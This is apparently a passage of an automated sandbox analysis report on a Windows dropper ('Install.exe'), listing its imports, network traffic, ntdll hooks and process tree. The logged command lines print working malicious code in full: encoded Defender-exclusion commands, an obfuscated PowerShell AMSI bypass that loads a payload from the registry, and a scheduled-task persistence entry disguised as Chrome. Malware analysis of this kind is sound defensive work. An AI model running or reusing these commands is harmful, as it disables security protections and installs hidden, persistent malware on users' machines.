                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .ndata0x360000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0x460000x42a80x4400False0.294404871324data4.14140312698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_ICON0x461f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x487980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x498400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_DIALOG0x49ca80x100dataEnglishUnited States
                          RT_DIALOG0x49da80x11cdataEnglishUnited States
                          RT_DIALOG0x49ec80x60dataEnglishUnited States
                          RT_GROUP_ICON0x49f280x30dataEnglishUnited States
                          RT_MANIFEST0x49f580x349XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                          Imports

                          DLLImport
                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Mar 27, 2022 01:40:58.721342087 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:40:58.752830029 CET8049735208.95.112.1192.168.2.4
                          Mar 27, 2022 01:40:58.752959013 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:40:58.753820896 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:40:58.785864115 CET8049735208.95.112.1192.168.2.4
                          Mar 27, 2022 01:40:58.916342020 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:42:02.109366894 CET8049735208.95.112.1192.168.2.4
                          Mar 27, 2022 01:42:02.109472036 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:42:24.943854094 CET8049735208.95.112.1192.168.2.4

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Mar 27, 2022 01:40:58.679579973 CET6064753192.168.2.48.8.8.8
                          Mar 27, 2022 01:40:58.696609020 CET53606478.8.8.8192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Mar 27, 2022 01:40:58.679579973 CET192.168.2.48.8.8.80xec82Standard query (0)ip-api.comA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Mar 27, 2022 01:40:58.696609020 CET8.8.8.8192.168.2.40xec82No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • ip-api.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.449735208.95.112.180C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          TimestampkBytes transferredDirectionData
                          Mar 27, 2022 01:40:58.753820896 CET827OUTGET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Mar 27, 2022 01:40:58.785864115 CET827INHTTP/1.1 200 OK
                          Date: Sun, 27 Mar 2022 00:40:57 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 5
                          Access-Control-Allow-Origin: *
                          X-Ttl: 60
                          X-Rl: 44
                          Data Raw: 74 72 75 65 0a
                          Data Ascii: true


                          Code Manipulations

                          User Modules

                          Hook Summary

                          Function NameHook TypeActive in Processes
                          ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                          NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                          ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                          NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                          ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                          NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                          NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                          ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                          ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                          NtResumeThreadINLINEexplorer.exe, winlogon.exe
                          RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                          NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                          NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                          ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                          ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                          Processes

                          Process: explorer.exe, Module: ntdll.dll
                          Function NameHook TypeNew Data
                          ZwEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          ZwResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                          NtDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                          ZwDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                          NtEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                          ZwEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                          RtlGetNativeSystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          NtEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          ZwQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                          Process: winlogon.exe, Module: ntdll.dll
                          Function NameHook TypeNew Data
                          ZwEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          ZwResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                          NtDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                          ZwDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                          NtEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                          ZwEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                          RtlGetNativeSystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          NtEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          ZwQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF

                          Statistics

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:1
                          Start time:01:40:46
                          Start date:27/03/2022
                          Path:C:\Users\user\Desktop\Install.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Install.exe"
                          Imagebase:0x400000
                          File size:4713759 bytes
                          MD5 hash:280BFD5EA1F41586EA0EF60EE44BC8DB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Target ID:2
                          Start time:01:40:47
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
                          Imagebase:0x400000
                          File size:5028144 bytes
                          MD5 hash:D55DC38B4EE6BED2168E74194533C572
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 50%, Virustotal, Browse
                          Reputation:low

                          General

                          Target ID:3
                          Start time:01:40:48
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:4
                          Start time:01:40:48
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\34432.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\34432.exe
                          Imagebase:0x770000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\34432.exe, Author: Arnim Rupp
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 35%, Virustotal, Browse
                          • Detection: 77%, ReversingLabs
                          Reputation:low

                          General

                          Target ID:5
                          Start time:01:40:49
                          Start date:27/03/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Imagebase:0xbe0000
                          File size:98912 bytes
                          MD5 hash:6807F903AC06FF7E1670181378690B22
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:6
                          Start time:01:40:58
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:7
                          Start time:01:40:59
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:8
                          Start time:01:40:59
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:20
                          Start time:01:41:27
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:22
                          Start time:01:41:36
                          Start date:27/03/2022
                          Path:C:\Windows\System32\nslookup.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\nslookup.exe
                          Imagebase:0x7ff6e2e30000
                          File size:86528 bytes
                          MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Target ID:23
                          Start time:01:41:41
                          Start date:27/03/2022
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
                          Imagebase:0xdd0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:24
                          Start time:01:41:41
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:25
                          Start time:01:41:42
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:26
                          Start time:01:41:42
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:27
                          Start time:01:41:45
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:28
                          Start time:01:41:46
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:29
                          Start time:01:41:46
                          Start date:27/03/2022
                          Path:C:\Windows\System32\schtasks.exe
                          Wow64 process (32bit):false
                          Commandline:schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
                          Imagebase:0x7ff71aea0000
                          File size:226816 bytes
                          MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:30
                          Start time:01:41:47
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x20000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Author: Arnim Rupp
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 77%, ReversingLabs

                          General

                          Target ID:31
                          Start time:01:41:48
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x7ff7fc480000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:32
                          Start time:01:41:49
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
